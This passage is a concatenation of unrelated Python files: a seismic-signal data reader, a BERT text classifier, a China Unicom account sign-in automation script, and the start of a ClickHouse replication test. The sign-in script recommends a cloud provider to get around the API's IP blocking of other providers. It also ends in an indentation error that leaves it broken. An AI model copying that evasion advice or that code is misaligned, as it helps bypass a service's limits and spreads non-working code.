                j = np.random.choice([0, 1, 2])
                if meta_signal['snr'][j] <= self.config.snr_threshold:
                    continue
                tmp_noise = meta_noise['data_FT'][..., j]
                if np.isinf(tmp_noise).any() or np.isnan(tmp_noise).any() or (not np.any(tmp_noise)):
                    continue
                tmp_noise = tmp_noise / np.std(tmp_noise)
                tmp_signal = np.zeros([self.X_shape[0], self.X_shape[1]], dtype=np.complex128)
                # 10% of samples are pure noise (tmp_signal stays all-zero and
                # is rejected by the np.any check below).
                if np.random.random() < 0.9:
                    shift = np.random.randint(-self.X_shape[1], 1, None, 'int')
                    tmp_signal[:, -shift:] = meta_signal['data_FT'][:, self.X_shape[1] : 2 * self.X_shape[1] + shift, j]
                if np.isinf(tmp_signal).any() or np.isnan(tmp_signal).any() or (not np.any(tmp_signal)):
                    continue
                tmp_signal = tmp_signal / np.std(tmp_signal)
                tmp_signal = self.add_event(tmp_signal, channels, j)
                if np.random.random() < 0.2:
                    tmp_signal = np.fliplr(tmp_signal)
                # Draw a strictly positive mixing ratio.
                ratio = 0
                while ratio <= 0:
                    ratio = self.config.noise_mean + np.random.randn() * self.config.noise_std
                tmp_noisy_signal = tmp_signal + ratio * tmp_noise
                noisy_signal = np.stack([tmp_noisy_signal.real, tmp_noisy_signal.imag], axis=-1)
                if np.isnan(noisy_signal).any() or np.isinf(noisy_signal).any():
                    continue
                noisy_signal = noisy_signal / np.std(noisy_signal)
                # Target: soft signal/noise mask, clipped to [0, 1].
                tmp_mask = np.abs(tmp_signal) / (np.abs(tmp_signal) + np.abs(ratio * tmp_noise) + 1e-4)
                tmp_mask[tmp_mask >= 1] = 1
                tmp_mask[tmp_mask <= 0] = 0
                mask = np.zeros([tmp_mask.shape[0], tmp_mask.shape[1], self.n_class])
                mask[:, :, 0] = tmp_mask
                mask[:, :, 1] = 1 - tmp_mask
                sess.run(self.enqueue, feed_dict={self.sample_placeholder: noisy_signal, self.target_placeholder: mask})

    def start_threads(self, sess, n_threads=8):
        """Start `n_threads` daemon worker threads running thread_main."""
        for i in range(n_threads):
            thread = threading.Thread(target=self.thread_main, args=(sess, n_threads, i))
            thread.daemon = True
            thread.start()
            self.threads.append(thread)
        return self.threads
class DataReader_test(DataReader):
    """Deterministic variant of DataReader for evaluation.

    Seeds NumPy per example so the signal/noise pairing and mixing ratio
    are reproducible, and enqueues extra diagnostics (normalization ratio,
    clean signal, scaled noise, file name) alongside sample and mask.
    """

    def __init__(
        self,
        signal_dir=None,
        signal_list=None,
        noise_dir=None,
        noise_list=None,
        queue_size=None,
        coord=None,
        config=Config(),
    ):
        # Setup is identical to DataReader (the original duplicated the whole
        # body); self.add_queue() inside the parent constructor dispatches to
        # the extended queue defined below.
        super().__init__(
            signal_dir=signal_dir,
            signal_list=signal_list,
            noise_dir=noise_dir,
            noise_list=noise_list,
            queue_size=queue_size,
            coord=coord,
            config=config,
        )

    def add_queue(self):
        """Create placeholders and a queue carrying evaluation diagnostics."""
        self.sample_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
        self.target_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
        self.ratio_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
        self.signal_placeholder = tf.compat.v1.placeholder(dtype=tf.complex64, shape=None)
        self.noise_placeholder = tf.compat.v1.placeholder(dtype=tf.complex64, shape=None)
        self.fname_placeholder = tf.compat.v1.placeholder(dtype=tf.string, shape=None)
        self.queue = tf.queue.PaddingFIFOQueue(
            self.queue_size,
            ['float32', 'float32', 'float32', 'complex64', 'complex64', 'string'],
            shapes=[
                self.config.X_shape,
                self.config.Y_shape,
                [],
                self.config.signal_shape,
                self.config.noise_shape,
                [],
            ],
        )
        self.enqueue = self.queue.enqueue(
            [
                self.sample_placeholder,
                self.target_placeholder,
                self.ratio_placeholder,
                self.signal_placeholder,
                self.noise_placeholder,
                self.fname_placeholder,
            ]
        )
        return 0

    def dequeue(self, num_elements):
        """Dequeue up to `num_elements` tuples (allows a short final batch)."""
        output = self.queue.dequeue_up_to(num_elements)
        return output

    def thread_main(self, sess, n_threads=1, start=0):
        """Single pass over the assigned slice of the signal list."""
        index = list(range(start, self.n_signal, n_threads))
        for i in index:
            np.random.seed(i)  # reproducible pairing/mixing per example
            fname = self.signal.iloc[i]['fname']
            fname_signal = os.path.join(self.signal_dir, fname)
            meta = np.load(fname_signal)
            data_FT = []
            snr = []
            for j in range(3):
                tmp_data = meta['data'][..., j]
                tmp_itp = meta['itp']
                snr.append(self.get_snr(tmp_data, tmp_itp))
                tmp_data -= np.mean(tmp_data)
                f, t, tmp_FT = scipy.signal.stft(
                    tmp_data, fs=self.config.fs, nperseg=self.config.nperseg, nfft=self.config.nfft, boundary='zeros'
                )
                data_FT.append(tmp_FT)
            data_FT = np.stack(data_FT, axis=-1)
            meta_signal = {'data_FT': data_FT, 'itp': tmp_itp, 'channels': meta['channels'], 'snr': snr}
            channels = meta['channels'].tolist()
            start_tp = meta['itp'].tolist()
            if channels not in self.buffer_channels_noise:
                self.buffer_channels_noise[channels] = self.noise[self.noise['channels'] == channels]
            fname_noise = os.path.join(
                self.noise_dir, self.buffer_channels_noise[channels].sample(n=1, random_state=i).iloc[0]['fname']
            )
            meta = np.load(fname_noise)
            data_FT = []
            # `k` (was `i`) — the original shadowed the outer file index.
            for k in range(3):
                tmp_data = meta['data'][: self.config.nt, k]
                tmp_data -= np.mean(tmp_data)
                f, t, tmp_FT = scipy.signal.stft(
                    tmp_data, fs=self.config.fs, nperseg=self.config.nperseg, nfft=self.config.nfft, boundary='zeros'
                )
                data_FT.append(tmp_FT)
            data_FT = np.stack(data_FT, axis=-1)
            meta_noise = {'data_FT': data_FT, 'channels': meta['channels']}
            if self.coord.should_stop():
                # Dropped the dead `stop = True` — there is no enclosing while
                # loop here, so `break` alone ends the pass.
                break
            j = np.random.choice([0, 1, 2])
            tmp_noise = meta_noise['data_FT'][..., j]
            if np.isinf(tmp_noise).any() or np.isnan(tmp_noise).any() or (not np.any(tmp_noise)):
                continue
            tmp_noise = tmp_noise / np.std(tmp_noise)
            # np.complex_ was removed in NumPy 2.0; complex128 is the same dtype.
            tmp_signal = np.zeros([self.X_shape[0], self.X_shape[1]], dtype=np.complex128)
            if np.random.random() < 0.9:
                shift = np.random.randint(-self.X_shape[1], 1, None, 'int')
                tmp_signal[:, -shift:] = meta_signal['data_FT'][:, self.X_shape[1] : 2 * self.X_shape[1] + shift, j]
            if np.isinf(tmp_signal).any() or np.isnan(tmp_signal).any() or (not np.any(tmp_signal)):
                continue
            tmp_signal = tmp_signal / np.std(tmp_signal)
            # Draw a strictly positive mixing ratio.
            ratio = 0
            while ratio <= 0:
                ratio = self.config.noise_mean + np.random.randn() * self.config.noise_std
            tmp_noisy_signal = tmp_signal + ratio * tmp_noise
            noisy_signal = np.stack([tmp_noisy_signal.real, tmp_noisy_signal.imag], axis=-1)
            if np.isnan(noisy_signal).any() or np.isinf(noisy_signal).any():
                continue
            std_noisy_signal = np.std(noisy_signal)
            noisy_signal = noisy_signal / std_noisy_signal
            # Target: soft signal/noise mask, clipped to [0, 1].
            tmp_mask = np.abs(tmp_signal) / (np.abs(tmp_signal) + np.abs(ratio * tmp_noise) + 1e-4)
            tmp_mask[tmp_mask >= 1] = 1
            tmp_mask[tmp_mask <= 0] = 0
            mask = np.zeros([tmp_mask.shape[0], tmp_mask.shape[1], self.n_class])
            mask[:, :, 0] = tmp_mask
            mask[:, :, 1] = 1 - tmp_mask
            sess.run(
                self.enqueue,
                feed_dict={
                    self.sample_placeholder: noisy_signal,
                    self.target_placeholder: mask,
                    self.ratio_placeholder: std_noisy_signal,
                    self.signal_placeholder: tmp_signal,
                    self.noise_placeholder: ratio * tmp_noise,
                    self.fname_placeholder: fname,
                },
            )
class DataReader_pred_queue(DataReader):
    """Queue-based reader for prediction: streams STFT spectrograms of raw
    signal files (no noise mixing, no targets) into a TF padding queue
    together with the normalization ratio and the file name."""
    def __init__(self, signal_dir, signal_list, queue_size, coord, config=Config()):
        # No noise inputs here — only the signal list is read.
        self.config = config
        signal_list = pd.read_csv(signal_list)
        self.signal = signal_list
        self.n_signal = len(self.signal)
        self.n_class = config.n_class
        self.X_shape = config.X_shape
        self.Y_shape = config.Y_shape
        self.signal_dir = signal_dir
        self.coord = coord
        self.threads = []
        self.queue_size = queue_size
        self.add_placeholder()
    def add_placeholder(self):
        # (sample, normalization std, file name) queue; shapes [] are scalars.
        self.sample_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
        self.ratio_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
        self.fname_placeholder = tf.compat.v1.placeholder(dtype=tf.string, shape=None)
        self.queue = tf.queue.PaddingFIFOQueue(
            self.queue_size, ['float32', 'float32', 'string'], shapes=[self.config.X_shape, [], []]
        )
        self.enqueue = self.queue.enqueue([self.sample_placeholder, self.ratio_placeholder, self.fname_placeholder])
    def dequeue(self, num_elements):
        # dequeue_up_to allows a short final batch at end of data.
        output = self.queue.dequeue_up_to(num_elements)
        return output
    def thread_main(self, sess, n_threads=1, start=0):
        # Single pass over this worker's slice of the file list.
        index = list(range(start, self.n_signal, n_threads))
        shift = 0  # fixed window start: always the first config.nt samples
        for i in index:
            fname = self.signal.iloc[i]['fname']
            data_signal = np.load(os.path.join(self.signal_dir, fname))
            # Detrend, then STFT with the configured window parameters.
            f, t, tmp_signal = scipy.signal.stft(
                scipy.signal.detrend(np.squeeze(data_signal['data'][shift : self.config.nt + shift])),
                fs=self.config.fs,
                nperseg=self.config.nperseg,
                nfft=self.config.nfft,
                boundary='zeros',
            )
            # Stack real/imaginary parts as the last axis.
            noisy_signal = np.stack([tmp_signal.real, tmp_signal.imag], axis=-1)
            if np.isnan(noisy_signal).any() or np.isinf(noisy_signal).any() or (not np.any(noisy_signal)):
                continue
            std_noisy_signal = np.std(noisy_signal)
            if std_noisy_signal == 0:  # skip flat traces (cannot normalize)
                continue
            noisy_signal = noisy_signal / std_noisy_signal
            sess.run(
                self.enqueue,
                feed_dict={
                    self.sample_placeholder: noisy_signal,
                    self.ratio_placeholder: std_noisy_signal,
                    self.fname_placeholder: fname,
                },
            )
class DataReader_pred:
    """Map-style dataset for prediction.

    Reads waveforms from numpy/.npz, miniSEED, or HDF5 files, optionally
    resamples them to 100 Hz, and returns STFT spectrograms (real/imag
    stacked last) via __getitem__; dataset() wraps it in a tf.data pipeline.
    """

    def __init__(self, signal_dir, signal_list, format="numpy", sampling_rate=100, config=Config()):
        self.buffer = {}
        self.config = config
        self.format = format
        self.dtype = "float32"
        # The file list may be tab- or comma-separated; try TSV first.
        try:
            signal_list = pd.read_csv(signal_list, sep="\t")["fname"]
        except Exception:
            signal_list = pd.read_csv(signal_list)["fname"]
        self.signal_list = signal_list
        self.n_signal = len(self.signal_list)
        self.signal_dir = signal_dir
        self.sampling_rate = sampling_rate
        self.n_class = config.n_class
        FT_shape = self.get_data_shape()
        self.X_shape = [*FT_shape, 2]

    def _read(self, base_name):
        """Dispatch to the reader matching self.format.

        Raises ValueError for unknown formats (previously `meta` was left
        unbound, producing a confusing NameError downstream).
        """
        if self.format == "numpy":
            return self.read_numpy(os.path.join(self.signal_dir, base_name))
        elif self.format == "mseed":
            return self.read_mseed(os.path.join(self.signal_dir, base_name))
        elif self.format == "hdf5":
            return self.read_hdf5(base_name)
        raise ValueError(f"Format {self.format} not supported")

    def get_data_shape(self):
        """Infer the STFT output shape from the first file in the list."""
        base_name = self.signal_list[0]
        meta = self._read(base_name)
        data = meta["data"]
        data = np.transpose(data, [2, 1, 0])
        if self.sampling_rate != 100:
            t = np.linspace(0, 1, data.shape[-1])
            # np.int was removed from NumPy (1.24+); the builtin int is equivalent.
            t_interp = np.linspace(0, 1, int(np.around(data.shape[-1] * 100.0 / self.sampling_rate)))
            data = interp1d(t, data, kind="slinear")(t_interp)
        f, t, tmp_signal = scipy.signal.stft(
            data, fs=self.config.fs, nperseg=self.config.nperseg, nfft=self.config.nfft, boundary='zeros'
        )
        logging.info(f"Input data shape: {tmp_signal.shape} measured on file {base_name}")
        return tmp_signal.shape

    def __len__(self):
        return self.n_signal

    def read_numpy(self, fname):
        """Load a .npz file into a dict with keys data/itp/its/t0; results
        are cached in self.buffer. Data is normalized to shape (nt, 1, nch)."""
        if fname not in self.buffer:
            npz = np.load(fname)
            meta = {}
            if len(npz['data'].shape) == 1:
                meta["data"] = npz['data'][:, np.newaxis, np.newaxis]
            elif len(npz['data'].shape) == 2:
                meta["data"] = npz['data'][:, np.newaxis, :]
            else:
                meta["data"] = npz['data']
            if "p_idx" in npz.files:
                if len(npz["p_idx"].shape) == 0:
                    meta["itp"] = [[npz["p_idx"]]]
                else:
                    meta["itp"] = npz["p_idx"]
            if "s_idx" in npz.files:
                if len(npz["s_idx"].shape) == 0:
                    meta["its"] = [[npz["s_idx"]]]
                else:
                    meta["its"] = npz["s_idx"]
            if "t0" in npz.files:
                meta["t0"] = npz["t0"]
            self.buffer[fname] = meta
        else:
            meta = self.buffer[fname]
        return meta

    def read_hdf5(self, fname):
        """Read one dataset from an HDF5 file.

        NOTE(review): assumes self.h5_data was attached externally — nothing
        in this class sets it; confirm against the caller.
        """
        data = self.h5_data[fname][()]
        attrs = self.h5_data[fname].attrs
        meta = {}
        if len(data.shape) == 2:
            meta["data"] = data[:, np.newaxis, :]
        else:
            meta["data"] = data
        if "p_idx" in attrs:
            if len(attrs["p_idx"].shape) == 0:
                meta["itp"] = [[attrs["p_idx"]]]
            else:
                meta["itp"] = attrs["p_idx"]
        if "s_idx" in attrs:
            if len(attrs["s_idx"].shape) == 0:
                meta["its"] = [[attrs["s_idx"]]]
            else:
                meta["its"] = attrs["s_idx"]
        if "t0" in attrs:
            meta["t0"] = attrs["t0"]
        return meta

    def read_s3(self, format, fname, bucket, key, secret, s3_url, use_ssl):
        """Read a file from S3 in the given format.

        NOTE(review): assumes self.s3fs was attached externally — nothing in
        this class sets it; confirm against the caller.
        """
        with self.s3fs.open(bucket + "/" + fname, 'rb') as fp:
            if format == "numpy":
                meta = self.read_numpy(fp)
            elif format == "mseed":
                meta = self.read_mseed(fp)
            else:
                # The original raised a plain string, which is itself a
                # TypeError at runtime; raise a proper exception instead.
                raise ValueError(f"Format {format} not supported")
        return meta

    def read_mseed(self, fname):
        """Read a miniSEED file into (nt, 1, 3) float data plus start time t0.
        Channels are mapped to fixed slots via their last component letter."""
        mseed = obspy.read(fname)
        mseed = mseed.detrend("spline", order=2, dspline=5 * mseed[0].stats.sampling_rate)
        mseed = mseed.merge(fill_value=0)
        # Pad every trace to the common [starttime, endtime] span.
        starttime = min([st.stats.starttime for st in mseed])
        endtime = max([st.stats.endtime for st in mseed])
        mseed = mseed.trim(starttime, endtime, pad=True, fill_value=0)
        if mseed[0].stats.sampling_rate != self.sampling_rate:
            logging.warning(f"Sampling rate {mseed[0].stats.sampling_rate} != {self.sampling_rate} Hz")
        order = ['3', '2', '1', 'E', 'N', 'Z']
        order = {key: i for i, key in enumerate(order)}
        comp2idx = {"3": 0, "2": 1, "1": 2, "E": 0, "N": 1, "Z": 2}
        t0 = starttime.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3]
        nt = len(mseed[0].data)
        data = np.zeros([nt, 3], dtype=self.dtype)
        ids = [x.get_id() for x in mseed]
        if len(ids) == 3:
            for j, trace_id in enumerate(sorted(ids, key=lambda x: order[x[-1]])):
                data[:, j] = mseed.select(id=trace_id)[0].data.astype(self.dtype)
        else:
            if len(ids) > 3:
                logging.warning(f"More than 3 channels {ids}!")
            for trace_id in ids:
                j = comp2idx[trace_id[-1]]
                data[:, j] = mseed.select(id=trace_id)[0].data.astype(self.dtype)
        data = data[:, np.newaxis, :]
        meta = {"data": data, "t0": t0}
        return meta

    def __getitem__(self, i):
        """Return (spectrogram[nch, 1, nf, nt, 2], file name, start time)."""
        base_name = self.signal_list[i]
        meta = self._read(base_name)
        data = meta["data"]  # nt, 1, nch
        data = np.transpose(data, [2, 1, 0])  # nch, 1, nt
        if np.mod(data.shape[-1], 3000) == 1:  # 3001 => 3000
            data = data[..., :-1]
        if "t0" in meta:
            t0 = meta["t0"]
        else:
            t0 = "1970-01-01T00:00:00.000"
        if self.sampling_rate != 100:
            logging.warning(f"Resample from {self.sampling_rate} to 100!")
            t = np.linspace(0, 1, data.shape[-1])
            # np.int was removed from NumPy (1.24+); the builtin int is equivalent.
            t_interp = np.linspace(0, 1, int(np.around(data.shape[-1] * 100.0 / self.sampling_rate)))
            data = interp1d(t, data, kind="slinear")(t_interp)
        f, t, tmp_signal = scipy.signal.stft(
            data, fs=self.config.fs, nperseg=self.config.nperseg, nfft=self.config.nfft, boundary='zeros'
        )  # nch, 1, nf, nt
        noisy_signal = np.stack([tmp_signal.real, tmp_signal.imag], axis=-1)  # nch, 1, nf, nt, 2
        # Sanitize non-finite values instead of propagating them to the model.
        noisy_signal[np.isnan(noisy_signal)] = 0
        noisy_signal[np.isinf(noisy_signal)] = 0
        return noisy_signal.astype(self.dtype), base_name, t0

    def dataset(self, batch_size, num_parallel_calls=4):
        """Wrap this reader in a batched, prefetching tf.data iterator."""
        dataset = dataset_map(
            self,
            output_types=(self.dtype, "string", "string"),
            output_shapes=(self.X_shape, None, None),
            num_parallel_calls=num_parallel_calls,
        )
        dataset = tf.compat.v1.data.make_one_shot_iterator(
            dataset.batch(batch_size).prefetch(batch_size * 3)
        ).get_next()
        return dataset
if __name__ == "__main__":
    # %%
    # Smoke test — requires ./Dataset/yixiao/ to exist locally.
    data_reader = DataReader_pred(signal_dir="./Dataset/yixiao/", signal_list="./Dataset/yixiao.csv")
    # DataReader_pred.__getitem__ returns (spectrogram, file name, start time).
    # The old unpacking named the second element std_noisy_signal and then
    # crashed calling .shape on a string.
    noisy_signal, fname, t0 = data_reader[0]
    print(noisy_signal.shape, fname, t0)
    batch = data_reader.dataset(10)
    init = tf.compat.v1.initialize_all_variables()
    sess = tf.compat.v1.Session()
    sess.run(init)
    print(sess.run(batch))
|
pclassifier.py | import logging
from multiprocessing import get_context
from typing import List, Dict, Tuple, Union
import torch
from numpy import ndarray
from scipy.special import softmax
from torch import Tensor
from torch.nn.utils.rnn import pad_sequence
from transformers import BertTokenizerFast, BertForSequenceClassification
from synthesis_classifier.model import labels, max_input, get_model
from synthesis_classifier.utils import torch_dev
__all__ = [
'run_batch', 'paragraphs2batch', 'get_classification_scores',
'batch2tensor', 'batch2numpy',
'MultiprocessingClassifier',
]
__author__ = 'Haoyan Huo'
__email__ = 'haoyan.huo@lbl.gov'
__maintainer__ = 'Haoyan Huo'
def get_classification_scores(model_output: Tensor) -> List[Dict]:
    """
    Compute classifier scores of a batched model output.

    :param model_output: Outputs Tensor[Batch, 5] from a classifier model.
    :return: List of classifier scores in dict, one per batch item,
        mapping each label name to its softmax probability.
    """
    logits = model_output.cpu().numpy()
    probabilities = softmax(logits, axis=1)
    return [
        {name: prob.item() for name, prob in zip(labels, row)}
        for row in probabilities
    ]
@torch.no_grad()
def run_batch(batch_text: List[str],
              model: BertForSequenceClassification,
              tokenizer: BertTokenizerFast) -> List[Dict]:
    """
    Run model classifier for a list of paragraphs.

    :param batch_text: List of paragraph strings.
    :param model: The paragraph classifier.
    :param tokenizer: The BERT tokenizer.
    :return: One dict per paragraph with keys 'text', 'tokens', 'scores'.
    """
    all_tokenized, batch = paragraphs2batch(batch_text, tokenizer)
    model.eval()
    # Move every input tensor onto the model's device.
    device = torch_dev()
    batch = {key: tensor.to(device) for key, tensor in batch.items()}
    logits = model(**batch, return_dict=True).logits
    scores = get_classification_scores(logits)
    return [
        {'text': text, 'tokens': tokens, 'scores': score}
        for text, tokens, score in zip(batch_text, all_tokenized, scores)
    ]
def paragraphs2batch(paragraphs: List[str], tokenizer: BertTokenizerFast) -> \
        Tuple[List[List[str]], Dict]:
    """
    Convert a list of paragraphs to a model-input batch:

    1. Tokenize each paragraph.
    2. Pad input_ids to a common length and truncate at max_input.
    3. Build matching attention masks (1.0 on real tokens, 0.0 on padding).

    :param paragraphs: List of paragraphs.
    :param tokenizer: The BERT tokenizer.
    :return: Tokenized paragraphs and the batch dict of model inputs.
    """
    all_tokenized = [tokenizer.tokenize(p) for p in paragraphs]
    id_tensors = []
    mask_tensors = []
    for tokens in all_tokenized:
        ids = torch.tensor(tokenizer.convert_tokens_to_ids(tokens), dtype=torch.long)
        id_tensors.append(ids)
        mask_tensors.append(torch.ones_like(ids, dtype=torch.float))
    input_ids = pad_sequence(id_tensors, batch_first=True, padding_value=0)[:, :max_input]
    attention_mask = pad_sequence(mask_tensors, batch_first=True, padding_value=0.)[:, :max_input]
    return all_tokenized, {
        'input_ids': input_ids,
        'attention_mask': attention_mask,
    }
def batch2numpy(batch: Union[Dict, Tensor]):
    """
    Convert a batch into numpy arrays (that are easier to pickle).
    Dicts are converted recursively; anything else raises TypeError.
    """
    if isinstance(batch, Tensor):
        return batch.detach().cpu().numpy()
    if isinstance(batch, dict):
        return {key: batch2numpy(value) for key, value in batch.items()}
    raise TypeError('Unknown batch type %s to numpy' % type(batch))
def batch2tensor(batch: Union[Dict, ndarray]):
    """
    Convert a batch represented by numpy arrays into Tensors (for model
    input), moved onto the current device. Dicts convert recursively;
    anything else raises TypeError.
    """
    if isinstance(batch, ndarray):
        return torch.from_numpy(batch).to(torch_dev())
    if isinstance(batch, dict):
        return {key: batch2tensor(value) for key, value in batch.items()}
    raise TypeError('Unknown batch type to tensor %s' % type(batch))
def subprocess_classifier(queue, db_writer_queue, dev_id=0):
    """
    Worker classifier intended to run in a subprocess.

    Retrieves pre-tokenized, batched inputs from `queue`, classifies them,
    and forwards the results to `db_writer_queue`. Terminates when a None
    EOF symbol is received.

    :param queue: A queue from which (meta_ids, batch_numpy) will be yielded.
    :param db_writer_queue: A queue receiving (meta_ids, scores, hidden_states).
    :param dev_id: Optional device id to be set in PyTorch.
    """
    torch.cuda.set_device(dev_id)
    model = get_model()
    logging.info('Device %d ready to classify text.', dev_id)
    # iter() with a sentinel: keep pulling batches until None arrives.
    for meta_ids, batch_numpy in iter(queue.get, None):
        batch = batch2tensor(batch_numpy)
        with torch.no_grad():
            output = model(**batch, return_dict=True)
        hidden_states = output.hidden_states[0].detach().cpu().numpy()
        scores = get_classification_scores(output.logits)
        db_writer_queue.put((meta_ids, scores, hidden_states))
class MultiprocessingClassifier(object):
    """
    A classifier that spawns one worker process per GPU so that all GPU
    resources installed on a machine are used.
    """

    def __init__(self, db_writer_queue):
        """
        Create a new multiprocessing classifier. The queues of subprocess
        classifiers can be obtained by accessing self.queues or using the
        following "with" codes:

        with MultiprocessingClassifier(writer_queue) as queues:
            # do stuff and send batches to queues

        :param db_writer_queue: The database writer queue that will be used by
            subprocess workers to send classifier results to.
        """
        n_gpus = torch.cuda.device_count()
        assert n_gpus > 0, "Must have at least one GPU!"
        logging.info('Spawning %d processes.', n_gpus)
        # 'spawn' (not 'fork') so CUDA can be initialized in the children.
        self.mp_ctx = get_context('spawn')
        # Bounded queues apply back-pressure to producers.
        self.queues = [self.mp_ctx.Queue(maxsize=16) for _ in range(n_gpus)]
        self.subprocesses = [self.mp_ctx.Process(
            target=subprocess_classifier, args=(self.queues[i], db_writer_queue, i)
        ) for i in range(n_gpus)]
        # Plain loop — the original used a list comprehension purely for its
        # side effects, which builds and discards a throwaway list.
        for process in self.subprocesses:
            process.start()

    def __enter__(self):
        return self.queues

    def send_eof(self):
        """
        Send EOF (None) to all subprocess workers.
        """
        for q in self.queues:
            q.put(None)

    def wait(self):
        """
        Block until all subprocess workers have exited.
        """
        for process in self.subprocesses:
            process.join()

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.send_eof()
        self.wait()
|
login.py | # -*- coding: utf8 -*-
from threading import Thread
from activity.unicom.dailySign import SigninApp
from utils.unicomLogin import UnicomClient
import json
import time
import requests
from utils.config import account_json,account
class LoginAgain(UnicomClient):
    """
    Sign-in page points task (original: 签到页积分任务).

    Extends UnicomClient with the HTTP headers used by the 10010 sign-in
    web app, then logs in immediately on construction.
    """
    def __init__(self, mobile, password):
        # mobile/password are forwarded to the UnicomClient base class.
        super(LoginAgain, self).__init__(mobile, password)
        # Headers mimicking the embedded sign-in page of the Unicom app.
        self.session.headers = requests.structures.CaseInsensitiveDict({
            "accept": "application/json, text/plain, */*",
            "origin": "https://img.client.10010.com",
            "user-agent": self.useragent,
            "content-type": "application/x-www-form-urlencoded",
            "referer": "https://img.client.10010.com/SigininApp/index.html",
            "x-requested-with": "com.sinovatech.unicom.ui"
        })
        # Authenticate right away so the instance is ready to run tasks.
        self.login()
def Template(cls):
    """Run cls(mobile, password).run in one thread per configured account.

    Accounts come from account_json: {mobile: {"password": ...}, ...}
    (multi-account support). All threads are started, then joined.
    """
    workers = [
        Thread(target=cls(mobile, account_json[mobile]['password']).run)
        for mobile in account_json.keys()
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
def main_handler(event=None, context=None):
    """
    Cloud-function entry point, triggered every 15 minutes
    (original: 腾讯云函数每15分钟执行一次). `event` and `context` are
    presumably required by the cloud-function calling convention and are
    unused here — confirm against the platform docs.
    """
    # ----------------------------------------------------------------
    # Prefer Huawei Cloud FunctionGraph workflows — Tencent Cloud Function
    # and Alibaba Function Compute IPs are blocked by the points API.
    # China Unicom daily sign-in.
    Template(LoginAgain)
if __name__ == '__main__':
main_handler("","") |
materialize_with_ddl.py | import time
import pymysql.cursors
import pytest
from helpers.network import PartitionManager
import logging
from helpers.client import QueryRuntimeException
from helpers.cluster import get_docker_compose_path, run_and_check
import random
import threading
from multiprocessing.dummy import Pool
from helpers.test_tools import assert_eq_with_retry
def check_query(clickhouse_node, query, result_set, retry_count=10, interval_seconds=3):
    """Poll `query` on `clickhouse_node` until it returns `result_set`.

    Retries up to `retry_count` times, sleeping `interval_seconds` between
    attempts and swallowing transient query errors; if the expected result
    never appears, a final query is asserted against `result_set`.
    """
    observed = ''
    attempt = 0
    while attempt < retry_count:
        try:
            observed = clickhouse_node.query(query)
            if result_set == observed:
                return
            logging.debug(f"latest_result{observed}")
            time.sleep(interval_seconds)
        except Exception as e:
            logging.debug(f"check_query retry {attempt+1} exception {e}")
            time.sleep(interval_seconds)
        attempt += 1
    # Retries exhausted: make the mismatch fail the test loudly.
    assert clickhouse_node.query(query) == result_set
def dml_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
    """Verify DML replication (INSERT/UPDATE/DELETE) through MaterializeMySQL.

    Creates a MySQL table covering (nearly) every supported column type,
    maps it into ClickHouse, then checks that inserts, ordinary-column
    updates, primary-key updates and deletes are all reflected.
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database_dml")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dml")
    mysql_node.query("CREATE DATABASE test_database_dml DEFAULT CHARACTER SET 'utf8'")
    # existed before the mapping was created
    mysql_node.query("CREATE TABLE test_database_dml.test_table_1 ("
                     "`key` INT NOT NULL PRIMARY KEY, "
                     "unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
                     "unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
                     "unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
                     "unsigned_int INT UNSIGNED, _int INT, "
                     "unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
                     "unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
                     "/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
                     "unsigned_float FLOAT UNSIGNED, _float FLOAT, "
                     "unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
                     "_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
                     "/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
                     "_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
    # it already has some data
    mysql_node.query("""
        INSERT INTO test_database_dml.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
        '2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
        """)
    clickhouse_node.query(
        "CREATE DATABASE test_database_dml ENGINE = MaterializeMySQL('{}:3306', 'test_database_dml', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database_dml" in clickhouse_node.query("SHOW DATABASES")
    # Pre-existing row must have been replicated during the initial dump.
    # BINARY(8) is right-padded with NULs, hence the '\\0\\0' in the TSV.
    check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
                "1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
                "2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n")
    mysql_node.query("""
        INSERT INTO test_database_dml.test_table_1 VALUES(2, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
        '2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', false);
        """)
    check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
                "1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
